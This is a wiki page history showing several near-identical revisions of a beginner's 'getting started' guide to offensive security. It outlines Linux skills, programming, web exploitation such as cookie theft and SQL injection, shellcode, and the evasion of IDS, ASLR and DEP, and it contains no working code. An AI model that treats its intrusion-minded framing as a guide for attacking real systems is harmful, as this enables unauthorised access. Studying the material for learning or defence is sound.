<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== [[Administration]] ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== [[Programming|Code]] == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. If you want to go head-first, start programming with a [[compiled language]] or go to a lower level like [[assembly]], if you prefer the easier approach, [[interpreted languages]] are the best place to start.<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming language. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words to make machine code easier to work with - for example, "\xcd\x80" comes "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
When learning to code, it is important to avoid the kinds of mistakes that lead to vulnerabilities in your code - such as [[Unsafe string replacement]]. Not only does learning about these vulnerabilities prevent your own code from being exploited, but the better you understand the potential pitfalls of a language, the better you can exploit those same pitfalls.<br />
<br />
== Information Gathering ==<br />
<br />
== [[Exploitation]] == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== [[Web exploitation]] ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], plant [[database]]-powered [[privilege escalation]] [[SQL backdoors|backdoors]] and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]]. The [[Bleeding Life]] project contains [[shellcode]] which utilizes [[return oriented programming]] in order to bypass [[ASLR]] and [[DEP]] [[countermeasures]] for [[vulnerability|vulnerable]] [[applications|software]] running on the windows 7 [[operating system]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7745User:Hatter/getting started2012-07-01T12:12:58Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming language. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words to make machine code easier to work with - for example, "\xcd\x80" comes "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7744User:Hatter/getting started2012-07-01T12:12:42Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming language. Machine code is what most people think of when they refer to "binary code" (though it is more often represented as hexadecimal opcodes), and assembly is a system of mnemonic words to make machine code easier to work with - for example, "\xcd\x80" comes "int $0x80". <br />
<br />
These languages are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]]. It is advisable to become familiar with C and at least learn enough assembly to understand how your C code is compiling. Learning interpreted languages such as PHP and Perl can also be useful for their flexibility and power.<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7743User:Hatter/getting started2012-07-01T12:04:05Z<p>DPYJulietowbaijc: /* Code */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
<br />
[[Programming]] is the next essential skill. While it is possible to perform exploitation on an [[application]] without any knowledge of the language it is written in, understanding of the language allows for a deeper understanding of the way the application you are exploiting handles input and processes data - if you understand what makes it work, you will understand what makes it stop working in the way you want it to. Why blunder in the dark when the user manual is right before you? <br />
<br />
<br />
[[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7742User:Hatter/getting started2012-07-01T11:46:32Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature. It is also a good idea to check the [[Anonymity]] article for tips on how to keep your identity secret on the internet - depending on just what you intend to do, these measures can be as simple or as complex as you desire.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7741User:Hatter/getting started2012-07-01T11:44:14Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux box - especially if you chose to use Gentoo. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7740User:Hatter/getting started2012-07-01T11:06:00Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
Protecting yourself on the internet is essential, although you have already taken the first step by using a linux (preferable Gentoo) box. In order to protect yourself from malicious packets, see the article on [[Iptables]] for filtering incoming packets and dropping those that are potentially malicious in nature.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
<br />
=== Binary exploitation ===<br />
Exploitation of [[compiled languages]] used to be much easier than it is today. Due to [[countermeasures]] like [[DEP]], [[ASLR]], and [[IPS]] applications/devices, [[binary]] [[exploitation]] is becoming more and more difficult. To perform a [[filter bypass]] on a modern [[Operating System]], the [[shellcode]] or [[machine code]] used during a [[buffer overflow]] exploit must be crafted to bypass all of the restrictions in place. Beginners usually start learning to write [[shellcode]] with a fundamental knowledge of [[assembly]]. Once an understanding of [[assembly]] for the respective [[operating system]] is obtained, [[null-free shellcode]] is usually the first type of shellcode written by a beginner. It is even possible to write printable and polymorphic [[alphanumeric shellcode]] and [[ascii shellcode]] for [[IDS evasion]].<br />
<br />
=== Network exploitation ===<br />
Network exploitation requires a solid understanding of network administration and network [[protocols]].<br />
<br />
== Maintaining access ==</div>DPYJulietowbaijchttps://nets.ec/index.php?title=User:Hatter/getting_started&diff=7739User:Hatter/getting started2012-07-01T10:37:06Z<p>DPYJulietowbaijc: /* Administration */</p>
<hr />
<div>So you're new to offensive security, and one day you want to call yourself a hacker. Understanding the building blocks of a system is the first step towards learning to control it. A solid basis in [[administration]] is needed in order to know how to use a machine. A solid basis in [[programming]] will help you understand what [[information gathering]] leads to successful [[exploitation]] and [[maintaining access]]. While [[countermeasures]] do get in the way, most can be [[IDS evasion|evaded]] or [[filter bypass|bypassed]] with an intermediate knowledge of [[programming]].<br />
<br />
<br />
== Administration ==<br />
Administration can be broken into a few categories, but for the purposes of this library, administration is divided into system administration, and network administration. <br />
<br />
Mastery of an [[Operating System]] is essential. Most [[server]]s on the internet are powered by [[Linux]]. While difficult, a head-first approach to learning [[Linux]] can be obtained with [[Gentoo Installation]]. We crawl before we learn to walk. Mastery of the basics of file manipulation, diagnostic tools and the like in the linux environment will make you much more efficient when using linux to do anything - be it rooting a box or web exploitation - so it is advised that you check out the [[Bash book]], which will familiarise you with the commands that are essential to efficiently using a linux system.<br />
<br />
== Code == <br />
[[Programming]] is the next essential skill. Without knowing a [[programming language]] it is nearly impossible to abuse any [[application]]. [[Assembly]] and [[machine code]] are the building blocks of all other programming language. These are the predecessors to the [[C]] language, a mid-level [[compiled language]] which became the cornerstone for nearly all of the modern [[interpreted languages]], including [[PHP]], [[Perl]], [[Python]], and [[Ruby]]. The [[Linux]] operating system is written in [[C]] and [[C++]].<br />
<br />
== Exploitation == <br />
Most beginners find [[web exploitation]] to be the easiest topic to start with. This requires a strong understanding of the [[HTTP|world wide web]]. [[Web application]]s are [[programming|programmed]] using a series of [[interpreted languages]]. This nearly always involves some form of [[HTML]] and [[CSS]], originally developed to be a document and that document's stylesheet. Dynamic content is usually powered by a [[database]], and usually involves [[SQL]] code. The [[programming language]]s used to render dynamic content are [[interpreted languages|interpreted]] on the web [[server]], while languages such as [[HTML]], [[CSS]], and [[JavaScript]] are interpreted and rendered by the client. <br />
<br />
=== Web exploitation ===<br />
[[Web exploitation]] can be used to [[Command Injection|execute remote commands]], [[steal cookies]], [[SQL injection|extract database information]], bypass [[authentication credentials|authentication]], and more. Simply because [[exploitation]] of [[interpreted languages]] is easier than [[exploitation]] of [[compiled languages]] does not make it any less effective. This, in conjunction with the recent popularity of [[web application]]s makes it the best place to begin. We've also developed a series of [[web exploitation tools]] to assist beginners in remedial tasks.<br />
